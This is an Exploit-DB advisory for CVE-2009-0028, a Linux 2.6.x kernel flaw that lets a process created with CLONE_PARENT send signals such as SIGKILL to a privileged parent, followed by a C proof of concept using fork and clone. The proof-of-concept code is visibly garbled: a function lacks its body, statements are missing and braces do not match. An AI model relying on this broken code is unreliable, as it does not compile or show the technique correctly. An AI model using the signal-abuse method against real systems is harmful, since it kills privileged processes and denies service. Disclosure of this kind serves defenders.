Linux Kernel 2.6.x - Cloned Process 'CLONE_PARENT' Local Origin Validation Weakness

ID EDB-ID:32815
Type exploitdb
Reporter Chris Evans
Modified 2009-02-25T00:00:00


Linux Kernel 2.6.x Cloned Process 'CLONE_PARENT' Local Origin Validation Weakness. CVE-2009-0028. Local exploit for linux platform


The Linux kernel is prone to an origin-validation weakness when dealing with signal handling.

This weakness occurs when a privileged process calls attacker-supplied processes as children. Attackers may exploit this to send arbitrary signals to the privileged parent process.

A local attacker may exploit this issue to kill vulnerable processes, resulting in a denial-of-service condition. In some cases, other attacks may also be possible.

Linux kernel 2.6.28 is vulnerable; other versions may also be affected. 

#include <sched.h>
#include <signal.h>
#include <stdlib.h>
#include <unistd.h>

static int the_child(void* arg) {

int main(int argc, const char* argv[]) {
  int ret = fork();
  if (ret < 0)
  else if (ret > 0)
    for (;;);
    int status;
    char* stack = malloc(4096);
    int flags = SIGKILL | CLONE_PARENT;
    int child = clone(the_child, stack + 4096, flags, NULL);